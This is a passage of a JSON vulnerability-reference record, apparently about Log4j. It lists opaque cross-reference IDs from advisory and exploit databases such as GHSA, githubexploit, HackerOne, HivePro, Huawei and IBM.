"GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-P6XC-XR62-6R2G", "GHSA-V57X-GXFJ-484Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "016A0841-D1FF-5056-B062-0D08FCE624CB", "02390955-9697-5950-8297-164CBB7695F0", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C734DE8-002A-5611-8897-213D53D85089", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26905C55-5DC7-5275-A0AF-FAF06685612E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D2CC855-C8BA-5DC6-8C78-D67984FBA93F", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4AC49DB9-A784-561B-BF92-94209310B51B", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4DC6D6A4-F23D-5A3D-98B8-3BB526D28144", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "59A6FBED-4F3E-5B1E-87FF-E637492A268A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "604B2FE5-9DF8-5C70-878D-2CCFAA39A6C1", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "66903BCE-DCE3-5FB9-B078-75CC2AD46662", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "70582B5B-E1E6-5767-94A6-39740A96A052", "70EDCB3B-9053-5056-980C-AC3123913F04", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "743571E7-B8EE-5E77-B047-E2E001379ACE", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7C8BD924-02A0-5873-B8AF-445DE0103959", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "84D5F04A-0DDB-5788-8759-DA99D303B756", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "88F20430-F65B-520C-880E-FB9413D8C14F", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E16065C-63FB-554A-B463-A1E8582A334F", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "8FB716EC-9A35-5F93-9759-B27A58B52CF8", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "926942FE-1507-5B71-9266-0A5EDC38EE50", "9297A534-2B19-597A-8952-6EC15EE80BFF", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "938D4200-A40C-5294-A146-4DF378B29573", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94A8FFF1-6A48-57CB-9340-D6806F47EFA0", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "9529CA86-8F3A-503D-9D02-94AC19D0CDD4", "952CB700-FA2F-5221-96B9-2656F967B63E", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9B0163DC-EE41-5E66-9AA8-A960262A2072", "9C874FAC-8640-5978-8C60-AF6528E5DF60", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A19F503A-900B-5929-8182-4BD7B1043185", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "A9A21055-01FA-5B3E-84B3-E294A9641418", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AF45C6B5-246A-5363-8436-954018BD121C", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "AFC5A984-3296-5D6A-AE73-0771AF4EDAF6", "B09C4EFC-2C66-5CA8-910F-E21D17B89608", "B16D26DB-D60C-5C0C-9452-80112720B442", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B32ED3B3-2054-5776-B952-907BE2CBEED6", "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B596B144-65DB-5863-8244-67AEE883C50E", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B8D5B910-B397-520E-9526-FE32D86E93D8", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "B9A69678-D96F-528D-B436-366259B4A283", "BA8F1657-CF64-574C-81BA-6432D5A351D4", "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "BD1B0180-DA8D-5255-B3FE-EB6CBC730206", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE4B2B71-B588-5666-9A02-7855DBD45762", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "BFB49B3A-706B-5625-9899-54FCB1EE767B", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C306DCEF-59B3-5147-8169-3674490BD35F", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3C6029E-8A78-5C0B-9CF6-51489E455464", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C6493FD0-579F-593F-A1E9-A44793F70419", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C96865D9-B80D-5799-9EB6-DDF13650F0AA", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "CD8CABD7-BE65-5434-B682-F73ABA737C65", "CE477D7E-7586-5C82-8DCC-033C48461E66", "CF96C0AC-16EB-57DE-B450-775CC256F1C2", "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "D0B02251-DCA3-58B6-B887-D339C4EAABF9", "D0D92ADF-A58E-5221-9885-A030242C0EF0", "D107A97F-1C44-59AB-8FFE-803D1DC21EA3", "D1E393B9-589D-5A20-8799-0F762FD361DA", "D21F1D28-2C44-5969-8F84-E5C6FF67DCFC", "D2602292-4969-564A-915E-2EFC6661FA35", "D298A3C8-E215-5549-B1A0-D01215070203", "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "D536CD4F-33F2-570F-BA34-54E141F1132C", "D64C04EA-093F-5924-A39B-714908D4637E", "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "D72095BC-06C5-50B2-8F66-EC86811783D3", "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "D77EE79D-71A5-51BA-9A16-DC757F86CC50", "D813949A-183D-55ED-AF64-B130B8F95A56", "D8246B9C-AC86-5FFA-AA8F-4419E4CD07F1", "DA01F84A-9B1D-5337-A465-2A9AB088C056", "DAB5D6B4-8A2D-58C0-835F-DA4F27B2142D", "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "DBBD6963-3870-5117-A829-3DE976AE90E2", "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "DE88B6AE-5D54-5B49-A097-57038C720463", "DECBAC7B-9235-5E00-81C1-142CD41306FB", "DEE433F2-3A1C-513B-AE6B-E11EFFB5A8E4", "DFF2F784-9ED2-50EF-B79E-3EBF5A9B5428", "E0452D6A-51BC-51F5-9C1C-6CF01DA2805E", "E0A2EF02-5087-5522-ABA0-52F4142BB87B", "E1457E6C-87A3-5557-A3F2-175005D2A765", "E1ABFD41-98C8-576F-8509-5541B40FD442", "E1FC5745-FCD7-58AF-9F4D-65D94090BBAB", "E278D22E-7EC5-5A63-ADFC-EDEFDC650AA1", "E4103A50-881C-52BB-86CC-27F549B798E9", "E4491698-477C-599A-A65D-EBA7441764E9", "E458F533-4B97-51A1-897B-1AF58218F2BF", "E4E73A91-5275-59C0-AB2A-7F3EE83DDE28", "E59C9A70-6F3E-5CF6-9F15-B0039E0FBAF1", "E655806B-A2A8-5BCB-A30A-0120CA3E97A6", "E6E03693-50B8-5AB4-B766-8464A228BA02", "E981B35D-7356-5A5A-963A-744545A4E51C", "E9B21C59-ED98-5B3B-A993-F1C214F8796C", "E9DFB8EA-B99D-5022-ACE6-5A42D0D6A350", "EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB", "EA3173CE-C426-5047-864A-480B1A30F235", "EA3C5D7E-0CC8-5AEC-8D7F-3C245A834DDA", "EA906824-9149-507D-893C-87A7FED8998B", "EB648301-A198-5E4A-A72E-9639ED09F6C9", "EC0987E2-0001-5D63-A5AF-09675A5915BD", "EC35769F-2EAD-5464-8F97-D90F768E1E2D", "EDDA4558-9527-5BDE-86E3-23DDD0BA5443", "EE01D764-5F14-5C0A-BD77-8E32854C5216", "EF37F62F-1579-535A-9C3E-49B080F41CAC", "EFD098FC-90C8-5665-98B7-79C96C6AEBAE", "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80", "F1E9BE6D-4024-56FB-80BB-B10ED5889144", "F208D311-79CA-5A2C-AE81-591BA4D30750", "F2F2719B-7041-5D1A-A95A-7617360B1D08", "F32DF396-0485-5F43-8A52-31B8DD252790", "F388C84A-40DA-58BC-BE0A-74C7E1712C54", "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "F493C59E-F2A7-52D1-B4B5-69CD3748C5E9", "F4C136DE-892B-5921-8475-E30BD548DDBB", "F50E9F2C-8C80-5A76-A993-A3E42414D797", "F523E799-3659-532F-8EED-40AD7F79E752", "F594470D-2599-5B2E-B317-C9720581C07D", "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "FB593988-2CFC-5828-8229-9274AC7B0F86", "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "FD364396-D660-5D23-8323-23248A5108C5", "FD65F47A-0B60-5F08-BFC2-1ABD16F49781", "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA"]}, {"type": "hackerone", "idList": ["H1:1423496", "H1:1425474", "H1:1427589", "H1:1429014", "H1:1438393"]}, {"type": "hivepro", "idList": ["HIVEPRO:09525E3475AC1C5F429611A90182E82F", "HIVEPRO:0D02D133141B167E9F03F4AC4CA5579A", "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "HIVEPRO:186D6EE394314F861D57F4243E31E975", "HIVEPRO:205916945365E4C9EB9829951A82295A", "HIVEPRO:310F7AA9457FF55D42E100B468844E6D", "HIVEPRO:5339CBE01BD312A79B81CAAEE0F3B32E", "HIVEPRO:57EAE0D1FD9EA88C12142AFF641985C3", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:B25417250BE7F8A7BBB1186F85A865F9", "HIVEPRO:C037186E3B2166871D34825A7A6719EE", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:E9C63D0D70D3232F21940B33FC205340", "HIVEPRO:F2305684A25C735549865536AA4254BF"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20211215-01-LOG4J"]}, {"type": "huntr", "idList": ["82B8FEB2-2ADB-4D99-9AAF-3D5BEE80B19A"]}, {"type": "ibm", "idList": ["004795EC88EC224A6BFB93940B96344B4EB9FAFDD91D056225AB0FB24FFE6CFE", "00B8C97EE29C4817481434B7FD887049A0EA42C49E5514E1877ED97B5322DB16", "00CA973D0D5F4A08ADB77D27F66CF53D661D1B67B8DA263B3CE4522918A4CFFF", "0172701FE5FE7C060372C9A6E7199B0E91A4F7E5904E7762F54202A8D4CB9759", "01C1A66F149F6CC650556CCBE7E381780D3142691366A6B6EFBC8CD5C674BD4D", "023C54E1D297D5AA9E7F44F8089DE35CB079281FA1776467BF8B7A7AD4FE252E", "03991456EAB03B09B39DC9DB5C8BE4A51167523943AA9AE61168FCD6FBACC80B", "03FB798F067FAF41EB009C69979886C89AC88567ECBC9DAD159CDC2AB547C1F7", "048C762AAACAFC74604EFAB15A41479F902FA040758DF428CB364B0242E01EE5", "04D3658F043D6F4A2AA1B2F519A7E89C112641C7C4E2E58E14BEC11BA66E803D", "053134070CB8D6609B7F157DC74146FFBCB3EBE941406A677E889C3CAF773364", "05A1D58708802BF8C1674EE32BEC4344254929330218CAD68AA838AA7F549BF7", "05BBDE1FB03AC43275CE3464D408E5E21E63D250E7B0CF0E90D314FBD5991752", "05C0F0FFAAC20F511D50030C8EC7ECBE67EB162A7352C90C63F986E1F73F829F", "05C433115EE2DEF62DD69CA7C7E97FF424FB6D815F82B8FFDD0435DD323AC60F", "05DC2B42328B1D8271D4FF358EC4A58529E6A6A6B8D7E154A691EFE1CCE81D1A", "06543959E3F80611BA94C3105900D725FA079835346EA88779BC4F272E259FC6", "07F48EB2EFD881D21294E1AFEEE704414B9605E4B9B1F4BF6C82B1917372C2B8", "084618FE115DBC963CDA469EFDF156D77B5FAF5BE04B99575716D75AE5C42F9B", "08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6", "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "08C5ED1F3E47E1FABE2752DAE40446E385D6C5EB30C70D7C739509CE04B06788", "08FF14BF18D2D8DEA2BCD9900A4BED9C481C9700F7CF99B6CD1B3F7EDA9C3865", "092A442A77CDFE46ED83F2F7A7AEC07007442443AE7B6D28BB557D1A8FE3BBB2", "09E2EB771A00246F88812FA7239EC135B4D760017A61975C9C7DFACAB2B566B3", "0A50FDB1D7E17C09815A2D06C237539FFD67E23789BDD9A730E5EB3DD9473349", 